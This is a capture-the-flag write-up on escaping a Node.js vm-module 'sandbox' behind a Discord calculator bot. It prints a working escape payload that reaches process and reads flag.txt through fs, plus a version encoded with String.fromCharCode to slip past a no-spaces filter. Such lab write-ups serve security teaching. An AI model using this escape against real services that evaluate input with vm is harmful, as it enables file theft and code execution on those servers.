Challenge Description

We introduced "sandboxing" using Node.js vm module on our calculator feature.
https://discord.gg/QjBQYgDpGz

Solution

When we visit the Discord server we can interact with the discordvm bot.

We also get a peak of what the source code looks like:

const vm = require('vm');
const payload = '1+1';
console.log(vm.runInNewContext(payload));

The problem is that spaces is not allowed, so we will have to bypass that restriction when sending our payload.

The payload we want to send looks like this:

this.constructor.constructor(String.fromCharCode(return this.process))().mainModule.require('fs').readFileSync('flag.txt')

This will basically "break out" of the sandbox, and allow us to access resources outside of the vm environment.

But since the payload contains whitespaces, we need to convert every character in return this.process to decimal, and use String.fromCharCode() to decode it back again.

In hindsight we could've just encoded the single whitespace character that's causing the issue, but, oh well. I was kind of tired when doing this challenge and didn't think straight ;)

The final payload ends up looking like this:

this.constructor.constructor(String.fromCharCode(114,101,116,117,114,110,32,116,104,105,115,46,112,114,111,99,101,115,115))().mainModule.require('fs').readFileSync('flag.txt')

And when we send that payload to the discord bot, we get the flag.

Flag: HTB{4lw4ys_RTFM!1}